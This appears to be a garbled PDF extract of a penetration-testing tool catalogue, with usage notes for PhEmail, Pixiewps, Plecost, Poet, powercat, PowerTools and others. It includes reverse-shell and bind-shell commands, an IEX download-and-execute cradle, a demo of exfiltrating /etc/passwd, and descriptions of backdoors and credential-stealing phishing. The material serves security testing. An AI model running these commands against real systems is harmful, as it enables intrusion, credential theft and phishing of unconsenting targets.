pull out all the credentials form the databases using a nice
Bash menu
BashScriptTemplate.sh - Handy boiler plate template fro
use in new scripts.
PythonScriptTemplate.py - Handy boiler plate template
fro use in new scripts.
ipexplode.pl - Simply expands CIDRs and prints the ips
in a list, handy for when you need a list of IPs and not a
CIDR
LinEsc.sh - Linux escilation script. This will test common

methods of gaining root access or show potential areas
such as sticky perms that can allow manual testing for root
escilation
gxfr.py - GXFR replicates dns zone transfers by
enumerating subdomains using advanced search engine
queries and conducting dns lookups.
knock.sh - Simple script used to test/perform port
knocking.
sslscan-split-file.py - Used to split a large SSLScan
results file into individual SSLScan results.
TestSSLServer.jar - Similar tool to SSLScan but with
different output.
wiffy.sh - Wiffy hacking tool, encapsulated in a single
Bash script.
Download PentestPackage
PENTOO 2015 - SECURITY-FOCUSED LIVECD BASED ON
GENTOO
Pentoo is a Live CD and Live USB designed for penetration

testing and security assessment. Based on Gentoo Linux,
Pentoo is provided both as 32 and 64 bit installable livecd.
Pentoo is also available as an overlay for an existing Gentoo
installation. It features packet injection patched wifi drivers,
GPGPU cracking software, and lots of tools for penetration
testing and security assessment. The Pentoo kernel includes
grsecurity and PAX hardening and extra patches - with binaries
compiled from a hardened toolchain with the latest nightly

versions of some tools available.
It's basically a gentoo install with lots of customized tools,
customized kernel, and much more. Here is a non-exhaustive
list of the features currently included :
Hardened Kernel with aufs patches
Backported Wifi stack from latest stable kernel release
Module loading support ala slax
Changes saving on usb stick
XFCE4 wm
Cuda/OPENCL cracking support with development tools
System updates if you got it finally installed
Put simply, Pentoo is Gentoo with the pentoo overlay. This
overlay is available in layman so all you have to do is layman -L
and layman -a pentoo.
We have a pentoo/pentoo meta ebuild and multiple pentoo
profiles, which will install all the pentoo tools based on USE
flags.
Pentoo 2015.0 RC3.8
Current Features :
Changes saving (including unetbooting support)
CUDA/OpenCL Enhanced cracking software
Kernel 4.0.8 and all needed patches for injection
XFCE 4.12
Please see blog for full release notes including known
bootloader issues with some versions of unetbootin
Full tools list.
DownloadPentoo 2015
PHAN - STATIC ANALYZER FOR PHP
Phan is a static analyzer for PHP.
Getting it running
Phan requires PHP 7+ with the php-ast extension loaded. The
code you analyze can be written for any version of PHP.
To get phan running;
1. Clone the repo
2. Run composer install to load dependencies
3. Run ./test to run the test suite
4. Test phan on itself by running the following
./phan `find src/ -type f -path '*.php'`
If you don't have a version of PHP 7 installed, you can grab a

php7dev Vagrant image or one of the many Docker builds out
there.
Then compile php-ast . Something along these lines should do
it:
git clone https://github.com/nikic/php-ast.git
cd php-ast
phpize
./configure
make install
And add extension=ast.so to your php.ini file. Check that it

is there with php -m . If it isn't you probably added it to the
wrong php.inifile. Check php --ini to see where it is looking.
Features
Checks for calls and instantiations of undeclared

functions, methods, closures and classes
Checks types of all arguments and return values to/from
functions, closures and methods
Supports @param , @return , @var and @deprecated
phpdoc comments including union and void/null types
Checks for Uniform Variable Syntax PHP 5 -> PHP 7 BC
breaks
Undefined variable tracking
Supports namespaces, traits and variadics
Generics (from phpdoc hints - int[], string[], UserObject[],
etc.)
See the tests directory for some examples of the various
checks.
Usage
phan *.php
or give it a text file containing a list of files (but see the next
section) to scan:
phan -f filelist.txt
and it might generate output that looks like this:

test1.php:191 UndefError call to undefined function
get_real_size()
test1.php:232 UndefError static call to undeclared class
core\session\manager
test1.php:386 UndefError Trying to instantiate undeclared
class lang_installer
test2.php:4 TypeError arg#1(arg) is object but
escapeshellarg() takes string
test2.php:4 TypeError arg#1(msg) is int but logmsg()
takes string defined at sth.php:5
test2.php:4 TypeError arg#2(level) is string but logmsg()
takes int defined at sth.php:5
test3.php:11 TypeError arg#1(number) is string but
number_format() takes float
test3.php:12 TypeError arg#1(string) is int but
htmlspecialchars() takes string
test3.php:13 TypeError arg#1(str) is int but md5() takes
string
test3.php:14 TypeError arg#1(separator) is int but
explode() takes string
test3.php:14 TypeError arg#2(str) is int but explode()
takes string
You can see the full list of command line options by running
phan -h .
Generating a file list
This static analyzer does not track includes or try to figure out
autoloader magic. It treats all the files you throw at it as one big
application. For code encapsulated in classes this works well.
For code running in the global scope it gets a bit tricky because
order matters. If you have an index.php including a file that
sets a bunch of global variables and you then try to access
those after the include in index.php the static analyzer won't
know anything about these.
In practical terms this simply means that you should put your
entry points and any files setting things in the global scope at
the top of your file list. If you have aconfig.php that sets
global variables that everything else needs put that first in the
list followed by your various entry points, then all your library
files containing your classes.
Bugs
When you find an issue, please take the time to create a tiny
reproducing code snippet that illustrates the bug. And once you
have done that, fix it. Then turn your code snippet into a test
and add it to tests then ./test and send a PR with your fix
and test. Alternatively, you can open an Issue with details.
More on phpdoc types
All the phpdoc types listed on that page should work with one
exception. It says that (int|string)[] would indicate an array
of ints or strings. phan doesn't support a mixed-type constraint
like that. You can say int[]|string[] meaning that the array
has to contain either all ints or all strings, but if you have mixed
types, just use array .
That means you can do:
<?php
/**
* MyFunc
* @param int
$arg1
* @param int|string
$arg2
* @param int[]|int
$arg3
* @param Datetime|Datetime[] $arg4

* @return array|null
*/
function MyFunc($arg1, $arg2, $arg3, $arg4=null) {
return null;
}
Just like in PHP, any type can be nulled in the function

declaration which also means a null is allowed to be passed in
for that parameter.
By default, and completely arbitrarily, for things like int[] it
checks the first 5 elements. If the first 5 are of the same type, it
assumes the rest are as well. If it can't determine the array subtype it just becomes array which will pass through most type
checks. In practical terms, this means that [1,2,'a'] is seen
as array but [1,2,3] is int[] and ['a','b','c'] as
string[] .
Dealing with dynamic code that confuses the analyzer
There are times when there is just no way for the analyzer to
get things right. For example:
<?php
function test() {
$var = 0;
$var = call_some_func_you_cant_hint();
if(is_string($var)) {
$pos = strpos($var, '|');
}
}
Your best option is, of course, to go and add a /** @return

string|array */ comment to the
call_some_func_you_cant_hint() function, but there are
times when that is not an option. As far as the analyzer is
concerned, $var is an int because all it sees is the $var = 0;
assignment. It will complain about you passing an int to
strpos() . You can help it out by adding a @var doc-type
comment before the function:
<?php
/**
* @var string|array $var
*/
function test() {
...
This tells the analyzer that along with the int that it figures out
on its own, $var can also be a string or an array inside that
function. This is a departure from the normal use of the @var

tag which is to give properties types, so I don't suggest making
a habit of using this hack. But it can be handy to shut up the
analyzer without having to refactor the code to not overload the
same variable with many different types.
How it works
One of the big changes in PHP 7 is the fact that the parser now
uses a real Abstract Syntax Tree ( AST ). This makes it much
easier to write code analysis tools by pulling the tree and
walking it looking for interesting things.
Phan has 2 passes. On the first pass it reads every file, gets
the AST and recursively parses it looking only for functions,
methods and classes in order to populate a bunch of global
hashes which will hold all of them. It also loads up definitions
for all internal functions and classes. The type info for these
come from a big file called FunctionSignatureMap.
The real complexity hits you hard in the second pass. Here
some things are done recursively depth-first and others not. For
example, we catch something likeforeach($arr as $k=>$v)
because we need to tell the foreach code block that $k and $v
exist. For other things we need to recurse as deeply as
possible into the tree before unrolling our way back out. For
example, for something like c(b(a(1))) we need to call a(1)
and check that a()actually takes an int, then get the return type
and pass it to b() and check that, before doing the same to
c() .
There is a Scope object which keeps track of all variables. It
mimics PHP's scope handling in that it has a globals along with
entries for each function, method and closure. This is used to
detect undefined variables and also type-checked on a return
$var .
Quick Mode Explained
In Quick-mode the scanner doesn't rescan a function or a

method's code block every time a call is seen. This means that
the problem here won't be detected:

<?php
function test($arg):int {
return $arg;
}
test("abc")
This would normally generate:

test.php:3 TypeError return string but `test()` is
declared to return int
The initial scan of the function's code block has no type

information for $arg . It isn't until we see the call and rescan
test()'s code block that we can detect that it is actually returning
the passed in string instead of an int as declared.
Running tests
vendor/bin/phpunit
Download Phan
PHEMAIL - AUTOMATE SENDING PHISHING EMAILS
PhEmail is a python open source phishing email tool that

automates the process of sending phishing emails as part of a
social engineering test. The main purpose of PhEmail is to
send a bunch of phishing emails and prove who clicked on
them without attempting to exploit the web browser or email
client but collecting as much information as possible. PhEmail
comes with an engine to garther email addresses through
LinkedIN, useful during the information gathering phase. Also,
this tool supports Gmail authentication which is a valid option in
case the target domain has blacklisted the source email or IP
address. Finally, this tool can be used to clone corporate login
portals in order to steal login credentials.
Usage
PHishing EMAIL tool v0.13
Usage: phemail.py [-e <emails>] [-m <mail_server>] [-f
<from_address>] [-r <replay_address>] [-s <subject>] [-b
<body>]
-e
emails: File containing list of emails
(Default: emails.txt)
-f
from_address: Source email address
displayed in FROM field of the email (Default: Name

Surname <name_surname@example.com>)
-r
reply_address: Actual email address used
to send the emails in case that people reply to the email

(Default: Name Surname <name_surname@example.com>)
-s
subject: Subject of the email (Default:
Newsletter)
-b
body: Body of the email (Default:
-p
pages: Specifies number of results pages
body.txt)
searched (Default: 10 pages)
-v
verbose: Verbose Mode (Default: false)
-l
layout: Send email with no embedded
-B
BeEF: Add the hook for BeEF
-m
mail_server: SMTP mail server to connect
-g
Google: Use a google account
pictures
to
username:password
-t
Time delay: Add deleay between each email
(Default: 3 sec)
-R
Bunch of emails per time (Default: 10
-L
webserverLog: Customise the name of the
emails)
webserver log file (Default: Date time in format "%d_%m_
%Y_%H_%M")
-S
Search: query on Google
-d
domain: of email addresses
-n
number: of emails per connection
(Default: 10 emails)
-c
clone: Clone a web page
-w
website: where the phishing email link
-o
save output in a file
-F
Format (Default: 0):
points to
0- firstname surname
1- firstname.surname@example.com
2- firstnamesurname@example.com
3- f.surname@example.com
4- firstname.s@example.com
5- surname.firstname@example.com
6- s.firstname@example.com
7- surname.f@example.com
8- surnamefirstname@example.com
9- firstname_surname@example.com
Examples: phemail.py -e emails.txt -f "Name Surname
<name_surname@example.com>" -r "Name Surname
<name_surname@example.com>" -s "Subject" -b body.txt
phemail.py -S example -d example.com -F 1 -p 12
phemail.py -c https://example.com
Disclaimer
Usage of PhEmail for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume
NO liability and are NOT responsible for any misuse or damage

caused by this program.
Download PhEmail
PIXIEWPS - BRUTEFORCE OFFLINE THE WPS PIN (PIXIE
DUST ATTACK)
Pixiewps is a tool written in C used to bruteforce offline the

WPS pin exploiting the low or non-existing entropy of some
APs (pixie dust attack). It is meant for educational purposes
only. All credits for the research go to Dominique Bongard.

DEPENDENCIES
Pixiewps requires libssl. To install it:

sudo apt-get install libssl-dev
INSTALLATION
Pixiewps can be built and installed by running:

~/pixiewps$ cd src
~/pixiewps/src$ make
~/pixiewps/src$ sudo make install
USAGE
Usage: pixiewps <arguments>
Required Arguments:
-e, --pke
: Enrollee public key
-r, --pkr
: Registrar public key
-s, --e-hash1
: Enrollee Hash1
-z, --e-hash2
: Enrollee Hash2
-a, --authkey
: Authentication session key
Optional Arguments:
-n, --e-nonce
: Enrollee nonce
-m, --r-nonce
: Registrar nonce
-b, --e-bssid
: Enrollee BSSID
-S, --dh-small
: Small Diffie-Hellman keys (PKr
not needed)
[No]
-f, --force
[No]
: Bruteforce the whole keyspace
-v, --verbosity
quietest
: Verbosity level 1-3, 1 is

[3]
-h, --help
: Display this usage screen
USAGE EXAMPLE
A common usage example is:

pixiewps --pke <pke> --pkr <pkr> --e-hash1 <e-hash1>
--e-hash2 <e-hash2> --authkey <authkey> --e-nonce <enonce>
which requires a modified version of Reaver or Bully which

prints AuthKey. The recommended version is reaver-wps-forkt6x.
If the following message is shown:
[!] The AP /might be/ vulnerable. Try again with --force or with
another (newer) set of data.
then the AP might be vulnerable and Pixiewps should be run
again with the same set of data along with the option --force
or alternatively with a newer set of data.
DESCRIPTION OF ARGUMENTS
-e, --pke
Enrollee's DH public key, found in M1.
-r, --pkr
Registrar's DH public key, found in M2 or can be
avoided by specifying
--dh-small in both Reaver and Pixiewps.
-s, --e-hash1
Enrollee Hash-1, found in M3.

-z, --e-hash2
Enrollee Hash-2, found in M3.
-a, --authkey
Registration Protocol authentication session key.
Although for this parameter a
modified version of Reaver or Bully is needed, it
can be avoided by specifying
small Diffie-Hellman keys in both Reaver and
Pixiewps and supplying --e-nonce,
--r-nonce and --e-bssid.
-n, --e-nonce
Enrollee's nonce, found in M1.
-m, --r-nonce
Registrar's nonce, found in M2.
-b, --e-bssid
Enrollee's BSSID.
-S, --dh-small
Small Diffie-Hellman keys. The same option MUST

be specified in Reaver
(1.3 or later versions) too. This option should
be avoided when possible.
-f, --force
Force Pixiewps to bruteforce the whole keyspace
(only for one type of PRNG).
It could take up to several minutes to complete.
-v, --verbosity
Verbosity level (1-3). Level 3 displays the most
information.
-h, --help
Display usage screen.
DownloadPixiewps
PLECOST - WORDPRESS VULNERABILITIES FINDER
Plecost is a vulnerability fingerprinting and vulnerability finder

for Wordpress blog engine.
Why?
There are a huge number of Wordpress around the world. Most

of them are exposed to be attacked and be converted into a
virus, malware or illegal porn provider, without the knowledge of
the blog owner.
This project try to help sysadmins and blog's owners to make a
bit secure their Wordpress.
What's new?
This Plecost 3 version, add a lot of new features and fixes, like:
Fixed a lot of bugs.
New engine: without threads or any dependencies, but run

more faster. We'll used python 3 asyncio and non-blocking
connections. Also consume less memory. Incredible,
right? :)
Changed CVE update system and storage: Now Plecost
get vulnerabilities directly from NIST and create a local
SQLite data base with filtered information for Wordpress
and theirs plugins.
Wordpress vulnerabilities: Now Plecost also manage
Wordpress Vulnerabilities (not only for the Plugins).
Add local vulnerability database are queryable. You can
consult the vulnerabilities for a concrete wordpress or
plugins without, using the local database.
You can read entire list in CHANGELOG file.
Installation
Install Plecost is so easy:

$ python3 -m pip install plecost
Remember that Plecost3 only runs in Python 3.

Quick start
Scan a web site si so simple:

$ plecost http://SITE.com
A bit complex scan: increasing verbosity exporting results in

JSON format and XML:
JSON
$ plecost -v http://SITE.com -o results.json
XML
$ plecost -v http://SITE.com -o results.xml
Advanced scan options
No check WordPress version, only for plugins:

$ plecost -nc http://SITE.com
Force scan, even if not Wordpress was detected:

$ plecost -f http://SITE.com
Display only the short banner:

$ plecost -nb http://SITE.com
List available wordlists:

$ plecost -nb -l
// Plecost - Wordpress finger printer Tool - v1.0.0
Available word lists:
1 - plugin_list_10.txt
6 - plugin_list_huge.txt
Select a wordlist in the list:

$ plecost -nb -w plugin_list_10.txt http://SITE.com
Increasing concurrency (USE THIS OPTION WITH CAUTION.

CAN SHUTDOWN TESTED SITE!)
$ plecost --concurrency 10 http://SITE.com
Or...
$ plecost -c 10 http://SITE.com
For more options, consult the --help command:

$ plecost -h
Updating
New versions and vulnerabilities are released diary, you can

upload the local database writing:
Updating vulnerability database:
$ plecost --update-cve
Updating plugin list:

$ plecost --update-plugins
ScreenShots
DownloadPlecost
POET - A SIMPLE POST-EXPLOITATION TOOL
The client program runs on the target machine and is

configured with an IP address (the server) to connect to and a
frequency to connect at. If the server isn't running when the
client tries to connect, the client quietly sleeps and tries again
at the next interval. If the server is running however, the
attacker gets a control shell to control the client and perform
various actions on the target including:
reconnaissance
remote shell
file exfiltration
download and execute
self destruct
Getting started
Go to the releases page and download the latest poet-client

and poet-server files available.
Then skip to the Usage section below.
Alternatively, you can build Poet yourself (it's pretty easy).
Make sure you have the python2.7 and zip executables
available.
$ git clone https://github.com/mossberg/poet
$ cd poet
$ make
This will create a bin/ directory which contains poet-client

and poet-server.
Usage
Poet is super easy to use, and requires nothing more than the
Python (2.7) standard library. To easily try it out, a typical
invocation would look like:
Terminal 1:
$ ./poet-client -v 127.0.0.1 1
Terminal 2:
$ sudo ./poet-server
Note: By default, the server needs to be run as root (using

sudo) because the default port it binds to is 443. If that makes
you uncomfortable, simply omit sudo and use the -p <PORT>
flag on both the client and server. Pick a nice, high number for
your port (> 1024).
Of course, using the -h flag gives you the full usage.
$ ./poet-client -h
usage: poet-client [-h] [-p PORT] [-v] [-d] IP [INTERVAL]
IP
server
INTERVAL
(s)
optional arguments:
-h, --help
-p PORT, --port PORT

-v, --verbose
-d, --delete
delete client upon execution
$ ./poet-server -h
usage: poet-server [-h] [-p PORT]
optional arguments:
-h, --help
-p PORT, --port PORT
Demo
This is just a small sample of what poet can do.

The scenario is, an attacker has gotten access to the victim's
machine and downloaded and executed the client (in verbose
mode ;). He/she does not have the server running at this point,
but it's ok, the client waits patiently. Eventually the attacker is
ready and starts the server, first starting a shell and executing
uname -a, then exfiltrating /etc/passwd. Then he/she exits and
detaches from the client, which continues running on the target
waiting for the next opportunity to connect to the server.
Victim's Machine (5.4.3.2):
$ ./poet-client -v 1.2.3.4 10
[+] Poet started with interval of 10 seconds to port 443.
Ctrl-c to exit.
[!] (2015-03-27 03:40:12.259676) Server is inactive
[+] (2015-03-27 03:40:42.273376) Server is active
Attacker's Machine (1.2.3.4):
# ./poet-server
_
____
____
___
/ /_
/ __ \/ __ \/ _ \/ __/
/ /_/ / /_/ /
__/ /
/ .___/\____/\___/\__/
/_/
[+] Poet server started on 443.
[+] (2015-03-27 03:40:42.272601) Connected By:
('5.4.3.2', 59309) -> VALID
[+] (2015-03-27 03:40:42.273087) Entering control shell
Welcome to psh, the Poet shell!
Running `help' will give you a list of supported
commands.
psh > shell
psh > user@server $ uname -a
Linux lolServer 3.8.0-29-generic #42~precise1-Ubuntu SMP
Wed May 07 16:19:23 UTC 2014 x86_64 x86_64 x86_64 GNU/
Linux
psh > user@server $ ^D
psh > exfil /etc/passwd
psh : exfil written to archive/20150327/exfil/
passwd-201503274054.txt
psh > help
Commands:
chint
dlexec
exec
exfil
exit
help
recon
selfdestruct
shell
psh > exit
[+] (2015-03-27 03:40:57.144083) Exiting control shell.
[-] (2015-03-27 03:40:57.144149) Poet server terminated.
DownloadPoet
PORTDOG - SIMPLE PYTHON SCRIPT TO DETECT PORT
SCANNING TECHNIQUES
PortDog is a network anomaly detector aimed to detect port

scanning techniques. It is entirely written in python and has
easy-to-use interface. It was tested on Ubuntu 15. Please note
that, it is not working on Windows OS due to suffering from
capturing RAW packets.I am working on to write this script to
work both platforms. In future , I'am thinking about adding
firewall options that could block malicious attempts. It is using
Raw packets for analysis. For this reason, please ensure that
you have run this script from privileged session.
Usage:
sudo python portdog.py -t time_for_sniff_in_minutes
For example, if you want to detect for 5 minutes use:

sudo python portdog.py -t 5
For infinite detection use:

sudo python portdog.py -t 0
If you want to get list of scanned ports , press CTRL+C to get

port list at runtime (If scan was happened).
DownloadPortDog
PORTEXPERT - MONITORS ALL APPLICATIONS
CONNECTED TO THE INTERNET
PortExpert gives you a detailed vision of your personnal

computer cybersecurity. It automatically monitors all
applications connected to the Internet and give you all the
information you might need to identify potential threats to your
system.
Features
Monitor of application using TCP/UDP communications

User-friendly interface
Identifies remote servers (WhoIs service)
Allows to open containing folder of any applications
Allow to easily search for more info online
Automatic identification of related service : FTP, HTTP,
HTTPS,...
Capability to show/hide system level processes
Capability to show/hide loopbacks
Time freeze function
DownloadPortExpert
POWERCAT - NETCAT: THE POWERSHELL VERSION
Installation
powercat is a powershell function. First you need to load the
function before you can execute it. You can put one of the
below commands into your powershell profile so powercat is
automatically loaded when powershell starts.
Load The Function From Downloaded .ps1 File:
. .\powercat.ps1
Load The Function From URL:
IEX (New-Object
System.Net.Webclient).DownloadString('https://
raw.githubusercontent.com/besimorhino/powercat/master/
powercat.ps1')
Parameters:
-l
Listen for a connection.
[Switch]
-c
Connect to a listener.
[String]
-p
The port to connect to, or listen on.
[String]
-e
Execute. (GAPING_SECURITY_HOLE)
[String]
-ep
Execute Powershell.
[Switch]
-r
Relay. Format: "-r tcp:
10.1.1.1:443"
-u
[String]
Transfer data over UDP.
[Switch]
-dns
Transfer data over dns (dnscat2).
[String]
-dnsft
DNS Failure Threshold.
[int32]
-t
Timeout option. Default: 60
[int32]
-i
Input: Filepath (string), byte array, or string.
[object]
-o
"String"
-of
Console Output Type: "Host", "Bytes", or

[String]
Output File Path.
[String]
-d
[Switch]
Disconnect after connecting.
-rep
Repeater. Restart after disconnecting.
[Switch]
-g
Generate Payload.
[Switch]
-ge
Generate Encoded Payload.
[Switch]
-h
Print the help message.
[Switch]
Basic Connections
By default, powercat reads input from the console and writes

input to the console using write-host. You can change the
output type to 'Bytes', or 'String' with -o.
Basic Client:
powercat -c 10.1.1.1 -p 443
Basic Listener:
powercat -l -p 8000
Basic Client, Output as Bytes:
powercat -c 10.1.1.1 -p 443 -o Bytes
File Transfer
powercat can be used to transfer files back and forth using -i

(Input) and -of (Output File).
Send File:
powercat -c 10.1.1.1 -p 443 -i C:\inputfile
Recieve File:
powercat -l -p 8000 -of C:\inputfile
Shells
powercat can be used to send and serve shells. Specify an

executable to -e, or use -ep to execute powershell.
Serve a cmd Shell:
powercat -l -p 443 -e cmd
Send a cmd Shell:

powercat -c 10.1.1.1 -p 443 -e cmd
Serve a shell which executes powershell commands:
powercat -l -p 443 -ep
DNS and UDP
powercat supports more than sending data over TCP. Specify u to enable UDP Mode. Data can also be sent to a dnscat2
server with -dns.
Send Data Over UDP:
powercat -c 10.1.1.1 -p 8000 -u
powercat -l -p 8000 -u
Connect to the c2.example.com dnscat2 server using the
DNS server on 10.1.1.1:
powercat -c 10.1.1.1 -p 53 -dns c2.example.com
Send a shell to the c2.example.com dnscat2 server using
the default DNS server in Windows:
powercat -dns c2.example.com -e cmd
Relays
Relays in powercat work just like traditional netcat relays, but

you don't have to create a file or start a second process. You
can also relay data between connections of different protocols.
TCP Listener to TCP Client Relay:
powercat -l -p 8000 -r tcp:10.1.1.16:443
TCP Listener to UDP Client Relay:
powercat -l -p 8000 -r udp:10.1.1.16:53
TCP Listener to DNS Client Relay
powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com
TCP Listener to DNS Client Relay using the Windows
Default DNS Server
powercat -l -p 8000 -r dns:::c2.example.com
TCP Client to Client Relay

powercat -c 10.1.1.1 -p 9000 -r tcp:10.1.1.16:443
TCP Listener to Listener Relay
powercat -l -p 8000 -r tcp:9000
Generate Payloads
Payloads which do a specific action can be generated using -g

(Generate Payload) and -ge (Generate Encoded Payload).
Encoded payloads can be executed with powershell -E. You
can use these if you don't want to use all of powercat.
Generate a reverse tcp payload which connects back to
10.1.1.15 port 443:
powercat -c 10.1.1.15 -p 443 -e cmd -g
Generate a bind tcp encoded command which listens on port
8000:
powercat -l -p 8000 -e cmd -ge
Misc Usage
powercat can also be used to perform portscans, and start

persistent servers.
Basic TCP Port Scanner:
(21,22,80,443) | % {powercat -c 10.1.1.10 -p $_ -t 1
-Verbose -d}
Start A Persistent Server That Serves a File:
powercat -l -p 443 -i C:\inputfile -rep
Download Powercat
POWERTOOLS - COLLECTION OF POWERSHELL
PROJECTS WITH A FOCUS ON OFFENSIVE OPERATIONS
Veil's PowerTools are a collection of PowerShell projects with a

focus on offensive operations.
This collection contains five projects:
PowerUp
PowerBreach
PowerPick
PewPewPew
PowerView
PowerUp
PowerUp is a powershell tool to assist with local privilege
escalation on Windows systems. It contains several methods to
identify and abuse vulnerable services, as well as DLL hijacking
opportunities, vulnerable registry settings, vulnerable schtasks,
and more.
Service Enumeration:
Get-ServiceUnquoted
returns services with
unquoted paths that also have a space in the name
Get-ServiceFilePermission
returns services
where the current user can write to the service binary

path or its config
Get-ServicePermission
returns services the
modifies a modifiable
current user can modify
Service Abuse:
Invoke-ServiceUserAdd
service to create a user and add it to the local

administrators
Invoke-ServiceCMD
execute an arbitrary
writes out a patched
command through service abuse

Write-UserAddServiceBinary
C# service binary that adds a local administrative user

Write-CMDServiceBinary
writes out a patched
C# binary that executes a custom command

Write-ServiceEXE
replaces a service
binary with one that adds a local administrator user

Write-ServiceEXECMD
replaces a service
binary with one that executes a custom command

Restore-ServiceEXE
restores a replaced
service binary with the original executable

Invoke-ServiceStart
starts a given
Invoke-ServiceStop
stops a given service
Invoke-ServiceEnable
enables a given
disables a given
returns detailed
service
service
Invoke-ServiceDisable
service
Get-ServiceDetail
information about a service
DLL Hijacking:
Find-DLLHijack
finds .dll hijacking
opportunities for currently running processes

Find-PathHijack
finds service %PATH
writes out a
checks if the
% .dll hijacking opportunities

Write-HijackDll
hijackable .dll
Registry Checks:
Get-RegAlwaysInstallElevated
AlwaysInstallElevated registry key is set

Get-RegAutoLogon
checks for Autologon
checks for any
credentials in the registry

Get-VulnAutoRun
modifiable binaries/scripts (or their configs) in HKLM

autoruns
Misc.:
Get-VulnSchTask
find schtasks with
finds remaining
checks for any
checks for encrypted
modifiable target files

Get-UnattendedInstallFile
unattended installation files
Get-Webconfig
encrypted web.config strings
Get-ApplicationHost
application pool and virtual directory passwords

Write-UserAddMSI
write out a MSI
installer that prompts for a user to be added

Invoke-AllChecks
runs all current
escalation checks and returns a report
PowerBreach
PowerBreach is a backdoor toolkit that aims to provide the user
a wide variety of methods to backdoor a system. It focuses on
diversifying the "trigger" methods which allows the user
flexibility on how to signal to the backdoor that it needs to
phone home. PowerBreach focuses on memory only methods
that do not persist across a reboot without further assistance
and is not a silver bullet when it comes to cover
communications.
Helper Functions:
Add-PSFirewallRules - Adds powershell to the firewall on
65K ports. Required Admin
Invoke-CallbackIEX - The location for the various
callback mechanisms. Calls back and executes encoded
payload.
Backdoors Available:
Invoke-EventLogBackdoor: Monitors for failed RDP login
attempts. Admin-Yes, Firewall-No, Auditing Reqd
Invoke-PortBindBackdoor: Binds to TCP Port. Admin-No,
Firewall-Yes
Invoke-ResolverBackdoor: Resolves name to decide when to
callback. Admin-No, Firewall-No
Invoke-PortKnockBackdoor: Starts sniffer looking for
trigger. Admin-Yes, Firewall-Yes

Invoke-LoopBackdoor: Callsback on set interval. Admin-No,
Firewall-No
Invoke-DeadUserBackdoor: Looks for "dead" user and calls
back when does not exist. Admin-No, Firewall-No
Callback URIs Available:

http://<host:port/resource> - Perform standard http
callback
https://<host:port/resource> - Perform standard https
callback
dnstxt://<host> - Resolve DNS text record for host which
is the payload
PowerPick
This project focuses on allowing the execution of Powershell
functionality without the use of Powershell.exe. Primarily this
project uses.NET assemblies/libraries to start execution of the
Powershell scripts.
Many thanks to those in the offensive powershell community.
This work is not ground breaking but hopefully will motivate
offense and defense to understand the implications and lack of
protections available.
PSInject.ps1
This project provides a powershell scipt (psinject.ps1) which

implements the Invoke-PSInject function. This script is based
off Powersploit's Invoke-ReflectivePEInjection and reflectively
injects the ReflectivePick DLL. It allows for the replacement of
the callback URL that is hard coded into the DLL. See this
script for more details.
The script that it calls back for must be base64 encoded. To do
this, you can simply use the built in linux utility 'base64'.
Example:
import-module psinject.ps1
Invoke-PSInject -Verbose -ProcID 0000 -CBURL http://
1.1.1.1/favicon.ico
ReflectivePick
This project is a reflective DLL based on Stephen Fewer's

method. It imports/runs a .NET assembly into its memory space
that supports the running of Powershell code using
System.Management.Automation. Due to its' reflective
property, it can be injected into any process using a reflective
injector and allows the execution of Powershell code by any
process, not just Powershell.exe. It extends inject/migrate
capabilities into powershell.
This DLL is meant to be used with PSInject.ps1 which provide
the ability to modify the hardcoded callback URL or with
Metasploit after compiling or patching the URL manually.
SharpPick
This project is a .NET executable which allows execution of

Powershell code through a number of methods. The script can
be embedded as a resource, read from a url, appeneded to the
binary, or read from a file. It was originally used as a proof of
concept to demonstrate/test the blocking of powershell and
bypass of applocker.
Man Page
sharppick.exe [<flag> <argument>]

flags:
-f <file> : Read script from specified file
-r <resource name> : Read script from specified resource
-d <url> : Read script from URL
-a <delimeter> : Read script appended to current binary
after specified delimeter. Delimeter should be very very
unique string
More SharpPick details here
PewPewPew
This repo contains scripts that utilize a common pattern to host
a script on a PowerShell webserver, invoke the IEX download
cradle to download/execute the target code and post the results
back to the server, and then post-process any results.
More details here
PowerView
PowerView is a PowerShell tool to gain network situational
awareness on Windows domains. It contains a set of purePowerShell replacements for various windows "net *"
commands, which utilize PowerShell AD hooks and underlying
Win32 API functions to perform useful Windows domain
functionality.
It also impements various useful metafunctions, including some
custom-written user-hunting functions which will identify where
on the network specific users are logged into. It can also check
which machines on the domain the current user has local

administrator access on. Several functions for the enumeration
and abuse of domain trusts also exist. See function
descriptions for appropriate usage and available options.
To run on a machine, start PowerShell with "powershell -exec
bypass" and then load the PowerView module with: PS>
Import-Module .\powerview.psm1 or load the PowerView script
by itself: PS> Import-Module .\powerview.ps1
For detailed output of underlying functionality, pass the -Debug
flag to most functions.
For functions that enumerate multiple machines, pass the Verbose flag to get a progress status as each host is
enumerated. Most of the "meta" functions accept an array of
hosts from the pipeline.
Misc Functions:
Export-PowerViewCSV
thread-safe CSV
Sets MAC attributes
append
Set-MacAttribute
for a file based on another file or input (from

Powersploit)
Copy-ClonedFile
copies a local file
to a remote location, matching MAC properties

Get-IPAddress
resolves a hostname
tests connectivity to
converts a given
to an IP
Test-Server
a specified server
Convert-NameToSid
user/group name to a security identifier (SID)
Convert-SidToName
converts a security
identifier (SID) to a group/user name

Convert-NT4toCanonical
converts a user/group
NT4 name (i.e. dev/john) to canonical format

Get-Proxy
enumerates local
get the ACLs for a
proxy settings
Get-PathAcl
local/remote file path with optional group recursion

Get-UserProperty
returns all
properties specified for users, or a set of user:prop

names
Get-ComputerProperty
returns all
properties specified for computers, or a set of

computer:prop names
Find-InterestingFile
search a local or
remote path for files with specific terms in the name

Invoke-CheckLocalAdminAccess
check if the current
user context has local administrator access to a

specified host
Get-DomainSearcher
builds a proper ADSI
searcher object for a given domain

Get-ObjectAcl
returns the ACLs
associated with a specific active directory object

Add-ObjectAcl
adds an ACL to a
specified active directory object

Invoke-ACLScanner
enumerate -1000+
modifable ACLs on a specified domain

Get-GUIDMap
returns a hash table
of current GUIDs -> display names

Get-DomainSID
return the SID for
the specified domain

Invoke-ThreadedFunction
helper that wraps
threaded invocation for other functions
net * Functions:
Get-NetDomain
gets the name of the
gets the forest
current user's domain

Get-NetForest
associated with the current user's domain

Get-NetForestDomain
gets all domains for
gets the domain
the current forest

Get-NetDomainController
controllers for the current computer's domain

Get-NetUser
returns all user
objects, or the user specified (wildcard specifiable)

Add-NetUser
adds a local or
gets a list of all
gets an array of all
domain user
Get-NetComputer
current servers in the domain
Get-NetPrinter
current computers objects in a domain

Get-NetOU
gets data for domain
gets current sites in
gets registered
